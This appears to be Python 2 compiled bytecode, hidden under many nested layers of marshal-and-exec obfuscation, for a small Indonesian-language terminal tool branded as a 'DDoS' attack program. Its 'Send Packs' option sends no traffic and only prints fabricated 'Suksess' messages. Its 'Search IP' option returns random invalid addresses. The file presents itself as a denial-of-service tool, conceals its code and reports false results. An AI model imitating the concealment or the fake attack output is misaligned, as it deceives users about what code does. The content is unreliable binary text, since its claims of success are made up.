\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x05 \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsn\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd7\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs@\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa9\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x12\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs{\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe4\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsM\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb6\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1f\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x88\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf1\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsZ\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc3\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs,\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x95\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfe\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsg\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd0\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs9\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa2\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x97\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00e\x00\x00j\x04\x00d\x02\x00\x83\x01\x00\x01d\x03\x00\x84\x00\x00Z\x05\x00d\x04\x00\x84\x00\x00Z\x06\x00d\x05\x00\x84\x00\x00Z\x07\x00d\x06\x00\x84\x00\x00Z\x08\x00d\x07\x00\x84\x00\x00Z\t\x00d\x08\x00\x84\x00\x00Z\n\x00d\t\x00\x84\x00\x00Z\x0b\x00d\n\x00\x84\x00\x00Z\x0c\x00e\x0c\x00\x83\x00\x00\x01e\t\x00\x83\x00\x00\x01d\x01\x00S(\x0b\x00\x00\x00i\xff\xff\xff\xffNt\x05\x00\x00\x00clearc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x13\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x17\x00\x00\x00\x1b[91m[\x1b[97mkeluar\x1b[91m](\x02\x00\x00\x00t\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x02\x00\x00\x00\x07\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns]\x04\x00\x00\x1b[1m\n\x1b[91m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x8c \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90 \xe2\x96\x88\xe2\x96\x88 Fuck \xe2\x96\x88\xe2\x96\x88\n\x1b[93m\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90 \xe2\x96\x88\xe2\x96\x88 DDoS \xe2\x96\x88\xe2\x96\x88\n\x1b[92m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x8c \xe2\x96\x88\xe2\x96\x88 :) \xe2\x96\x88\xe2\x96\x88\n\xe2\x96\x80\xe2\x9d\x8d\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x9d\x8d\xe2\x9d\x8d\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x9d\x8d\xe2\x9d\x8d\xe2\x96\x80 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1m\x1b[91m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mName \x1b[94m: \x1b[97mErlang \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mGithub \x1b[94m: \x1b[97mhttps://github.com/3RL4N9 \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mFacebook\x1b[94m: \x1b[97mhttps://fb.me/erlang.sans \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\x91\x1b[93m* \x1b[92mGender \x1b[94m: \x1b[97mCwk:v \x1b[91m\xe2\x95\x91\n\x1b[91m\xe2\x95\xa0\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa6\xe2\x95\xa3(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x04\x00\x00\x00logo\n\x00\x00\x00s\x02\x00\x00\x00\x00\x0cc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s"\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x00\x00S(\x04\x00\x00\x00NR\x00\x00\x00\x00s3\x00\x00\x00\x1b[97m\xe2\x95\xa0\x1b[91m[\x1b[97mAmunisi\x1b[91m]\x1b[91m[\x1b[97m80\x1b[91m]s\x83\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00systemR\x03\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x03\x00\x00\x00war\x17\x00\x00\x00s\x08\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s{\x00\x00\x00t\x00\x00\x83\x00\x00\x01t\x01\x00d\x01\x00\x83\x01\x00}\x00\x00d\x02\x00GHt\x01\x00d\x03\x00\x83\x01\x00}\x01\x00|\x01\x00d\x04\x00k\x02\x00r:\x00t\x02\x00\x83\x00\x00\x01n\x00\x00x:\x00t\x03\x00d\x05\x00\x83\x01\x00D],\x00}\x02\x00t\x04\x00j\x05\x00d\x06\x00\x83\x01\x00\x01d\x07\x00|\x00\x00d\x08\x00|\x01\x00d\t\x00f\x05\x00GHd\n\x00GHqG\x00Wd\x00\x00S(\x0b\x00\x00\x00Ns,\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\x1b[91m[\x1b[97mIP\x1b[91m]\x1b[97ms\x14\x00\x00\x00\x1b[97m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9ds4\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mPORT\x1b[91m]\x1b[97mt\x00\x00\x00\x00iQ\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?s\x17\x00\x00\x00\x1b[31mSend Packs To\x1b[97ms\x0b\x00\x00\x00\x1b[91m=\x1b[97ms\x0b\x00\x00\x00\x1b[91mSuksess\n\x00\x00\x00\x1b[32m[\xe2\x88\x9a](\x06\x00\x00\x00R\x06\x00\x00\x00t\x05\x00\x00\x00inputR\x02\x00\x00\x00t\x05\x00\x00\x00ranget\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x03\x00\x00\x00t\x02\x00\x00\x00ipt\x02\x00\x00\x00jmt\x01\x00\x00\x00_(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x01\x00\x00\x00q\x1c\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x07\x01\x0c\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x13\x01\r\x01\x14\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xb5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r:\x00d\x03\x00GHt\x01\x00j\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01nw\x00|\x00\x00d\x06\x00k\x02\x00rP\x00t\x05\x00\x83\x00\x00\x01na\x00|\x00\x00d\x07\x00k\x02\x00rf\x00t\x06\x00\x83\x00\x00\x01nK\x00|\x00\x00d\x08\x00k\x02\x00r|\x00t\x07\x00\x83\x00\x00\x01n5\x00|\x00\x00d\t\x00k\x02\x00r\x92\x00t\x08\x00\x83\x00\x00\x01n\x1f\x00d\n\x00GHt\x01\x00j\x02\x00d\x04\x00\x83\x01\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01d\x00\x00S(\x0b\x00\x00\x00Ns*\x00\x00\x00\x1b[92m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mCHOICE\x1b[91m]\x1b[97mR\x07\x00\x00\x00s\'\x00\x00\x00\x1b[91m[\x1b[97m!\x1b[91m]\x1b[97mDi Isi Sayang :)i\x02\x00\x00\x00s\x0e\x00\x00\x00python ddos.pyt\x01\x00\x00\x001t\x01\x00\x00\x002t\x01\x00\x00\x003t\x01\x00\x00\x000s&\x00\x00\x00\x1b[91m[\x1b[97m!\x1b[91m]\x1b[97mSalah Sayang :)(\t\x00\x00\x00R\x08\x00\x00\x00R\n\x00\x00\x00R\x0b\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x0f\x00\x00\x00t\x01\x00\x00\x00rt\x01\x00\x00\x00iR\x02\x00\x00\x00(\x01\x00\x00\x00t\x01\x00\x00\x00g(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x16\x00\x00\x00\'\x00\x00\x00s \x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\r\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x85\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00g\x04\x00\x83\x01\x00}\x00\x00d\x06\x00GHt\x05\x00d\x07\x00\x83\x01\x00}\x01\x00|\x01\x00d\x08\x00k\x02\x00rV\x00t\x06\x00\x83\x00\x00\x01n\x00\x00d\t\x00|\x01\x00d\n\x00|\x00\x00d\x0b\x00f\x05\x00GHt\x05\x00d\x0c\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\r\x00\x83\x01\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR\x00\x00\x00\x00s\x0e\x00\x00\x00134.35.087.123s\x0e\x00\x00\x00145.752.678.45s\r\x00\x00\x00125.87.907.45s\x0f\x00\x00\x00136.694.076.345sK\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mEXAMPLE\x1b[91m]\x1b[97=\x1b[91m[\x1b[97mwww.example.com\x1b[91m]s\'\x00\x00\x00\x1b[97m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mURL\x1b[91m]\x1b[97mR\x07\x00\x00\x00s!\x00\x00\x00\x1b[97m\xe2\x95\xa0\x1b[91m[\x1b[97m\xe2\x80\xa2\x1b[91m]\x1b[97ms\x0b\x00\x00\x00\x1b[91m=\x1b[97ms\x14\x00\x00\x00\x1b[91m[\x1b[97m\xe2\x80\xa2\x1b[91m]s(\x00\x00\x00\x1b[97m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mBACK\x1b[91m]\x1b[97ms\x0e\x00\x00\x00python ddos.py(\x07\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x03\x00\x00\x00t\x06\x00\x00\x00randomt\x06\x00\x00\x00choiceR\x08\x00\x00\x00R\x02\x00\x00\x00(\x02\x00\x00\x00t\x02\x00\x00\x00IPt\x02\x00\x00\x00Cr(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x14\x00\x00\x009\x00\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x1b\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x14\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHt\x03\x00d\x03\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01d\x00\x00S(\x05\x00\x00\x00NR\x00\x00\x00\x00s\xd7\x01\x00\x00\n\x1b[94m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mThanks to Allah\t \t \x1b[94m \t \xe2\x95\x91\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mIf Error You can Call me in FB\t \x1b[94m\xe2\x95\x91\n\x1b[94m\xe2\x95\x91\x1b[93mNote \x1b[96m: \x1b[97mThanks For Using My Tool :) \x1b[94m\xe2\x95\x91\n\x1b[94m\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9ds(\x00\x00\x00\x1b[94m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\x1b[91m[\x1b[97mBACK\x1b[91m]\x1b[97ms\x0e\x00\x00\x00python ddos.py(\x04\x00\x00\x00R\x04\x00\x00\x00R\x05\x00\x00\x00R\x03\x00\x00\x00R\x08\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>R\x15\x00\x00\x00D\x00\x00\x00s\n\x00\x00\x00\x00\x01\r\x01\x07\x06\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns\xe6\x01\x00\x00\n\x1b[92m\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa9\xe2\x95\xa3\n\x1b[92m\xe2\x95\x91\x1b[93m1\x1b[96m. \x1b[95m: \x1b[97mSend Packs \t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m2\x1b[96m. \x1b[95m: \x1b[97mSearch IP\t\t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m3\x1b[96m. \x1b[95m: \x1b[97mInformation\t\t\t \x1b[92m\xe2\x95\x91\n\x1b[92m\xe2\x95\x91\x1b[93m0\x1b[96m. \x1b[95m: \x1b[97mExit \t\t\t\t 